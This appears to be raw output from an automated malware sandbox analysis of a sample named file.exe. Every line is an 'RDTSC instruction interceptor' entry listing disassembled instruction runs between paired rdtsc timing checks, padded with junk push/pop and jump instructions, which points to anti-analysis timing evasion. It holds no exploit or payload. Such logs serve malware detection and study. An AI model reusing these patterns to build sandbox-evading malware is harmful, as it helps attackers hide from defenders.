Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818069 second address: 818071 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 819B87 second address: 819B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2CBC529166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C988 second address: 81C994 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2CBD27C5A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F02F second address: 81F033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81EC02 second address: 81EC10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F2CBD27C5A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 823AF6 second address: 823AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 823AFD second address: 823B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CBD27C5B6h 0x00000009 pop ebx 0x0000000a jns 00007F2CBD27C5B8h 0x00000010 popad 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 823B35 second address: 823B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 823240 second address: 823251 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2CBD27C5ACh 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 823251 second address: 823257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8286E6 second address: 8286EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8286EA second address: 8286F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8286F0 second address: 828706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2CBD27C5ACh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 828706 second address: 828714 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2CBC529166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9571 second address: 7D9589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CBD27C5B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8289D2 second address: 8289D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8289D8 second address: 8289F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F2CBD27C5A6h 0x0000000d jmp 00007F2CBD27C5B3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829581 second address: 8295A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBC529173h 0x00000007 jno 00007F2CBC529166h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8295A2 second address: 8295B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CBD27C5B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8295B9 second address: 8295BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82D658 second address: 82D68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F2CBD27C5AFh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 jmp 00007F2CBD27C5B5h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C9FC second address: 82CA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CBC529173h 0x00000009 jmp 00007F2CBC52916Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82D0C4 second address: 82D0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F2CBD27C5B5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 834C6D second address: 834C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2CBC529174h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 834C86 second address: 834CC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2CBD27C5ACh 0x00000008 jmp 00007F2CBD27C5B5h 0x0000000d jno 00007F2CBD27C5A6h 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F2CBD27C5B3h 0x0000001a push esi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 832EEA second address: 832EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnl 00007F2CBC529166h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83300D second address: 833027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBD27C5B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8332F6 second address: 8332FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8332FE second address: 833308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2CBD27C5A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 833308 second address: 83330C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83330C second address: 833312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 833B3C second address: 833B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F2CBC529190h 0x0000000e pushad 0x0000000f jmp 00007F2CBC529176h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b pop eax 0x0000001c push edi 0x0000001d pop edi 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8346B9 second address: 8346C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83498F second address: 834993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83E046 second address: 83E04B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 798994 second address: 798998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83D205 second address: 83D20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83D316 second address: 83D31C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83D31C second address: 83D326 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83D326 second address: 83D32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83D32C second address: 83D332 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83D332 second address: 83D359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2CBC529173h 0x0000000f push eax 0x00000010 ja 00007F2CBC529166h 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83D4B2 second address: 83D4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F2CBD27C5A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83D931 second address: 83D939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83D939 second address: 83D93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83D93F second address: 83D957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CBC529172h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83DA8B second address: 83DA8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83DA8F second address: 83DA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83DA95 second address: 83DA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83DA9B second address: 83DAB5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F2CBC529175h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83DAB5 second address: 83DAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F2CBD27C5A6h 0x0000000d jmp 00007F2CBD27C5B2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 843F6D second address: 843F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 843F71 second address: 843F7B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2CBD27C5A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 844221 second address: 844225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 844225 second address: 84423E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F2CBD27C5B3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84423E second address: 844272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBC529177h 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007F2CBC52917Eh 0x00000017 push eax 0x00000018 jp 00007F2CBC529166h 0x0000001e pop eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8443DE second address: 8443E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8446BE second address: 8446C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8446C2 second address: 8446D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2CBD27C5AAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8446D1 second address: 84470B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F2CBC529176h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007F2CBC529166h 0x0000001d jmp 00007F2CBC52916Ch 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84487A second address: 844880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 844880 second address: 844884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 844884 second address: 8448A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F2CBD27C5A6h 0x0000000d jmp 00007F2CBD27C5AAh 0x00000012 jng 00007F2CBD27C5A6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8449FA second address: 844A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F2CBC529168h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop ecx 0x00000017 push esi 0x00000018 jmp 00007F2CBC52916Ch 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 844B80 second address: 844B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CBD27C5AFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 844B95 second address: 844B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 845ACE second address: 845B0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007F2CBD27C5A6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2CBD27C5B6h 0x00000013 jmp 00007F2CBD27C5B8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8439C1 second address: 8439E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F2CBC529166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2CBC529171h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8439E2 second address: 8439E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8439E6 second address: 8439EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B2D9 second address: 78B2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B2DD second address: 78B2FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F2CBC52916Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F2CBC529166h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B2FB second address: 78B335 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F2CBD27C5B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F2CBD27C5B8h 0x00000011 jbe 00007F2CBD27C5A6h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8578A6 second address: 8578AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8578AC second address: 8578B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8578B6 second address: 8578BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8578BC second address: 8578C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8578C0 second address: 8578D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2CBC529166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 jc 00007F2CBC529166h 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8578D7 second address: 8578F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CBD27C5B3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8578F0 second address: 8578F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8578F4 second address: 857905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007F2CBD27C5A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85EB5C second address: 85EB60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85EB60 second address: 85EB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85EB66 second address: 85EB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85EB6C second address: 85EB71 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85EB71 second address: 85EB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86C029 second address: 86C035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86C035 second address: 86C056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F2CBC529172h 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F2CBC529166h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86C056 second address: 86C05A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86BEA3 second address: 86BEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86BEA7 second address: 86BEDC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F2CBD27C5B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2CBD27C5B8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86DF52 second address: 86DF77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBC529171h 0x00000007 jp 00007F2CBC529166h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 jo 00007F2CBC529166h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 872018 second address: 87201C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87201C second address: 872056 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2CBC529166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F2CBC529168h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007F2CBC529176h 0x0000001a popad 0x0000001b popad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 jne 00007F2CBC529166h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8765A7 second address: 8765C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CBD27C5B5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8765C0 second address: 87660C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F2CBC529177h 0x0000000e jmp 00007F2CBC529172h 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007F2CBC529177h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 87689E second address: 8768B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F2CBD27C5ADh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8768B6 second address: 8768E5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2CBC529166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2CBC529176h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2CBC52916Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8768E5 second address: 8768EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
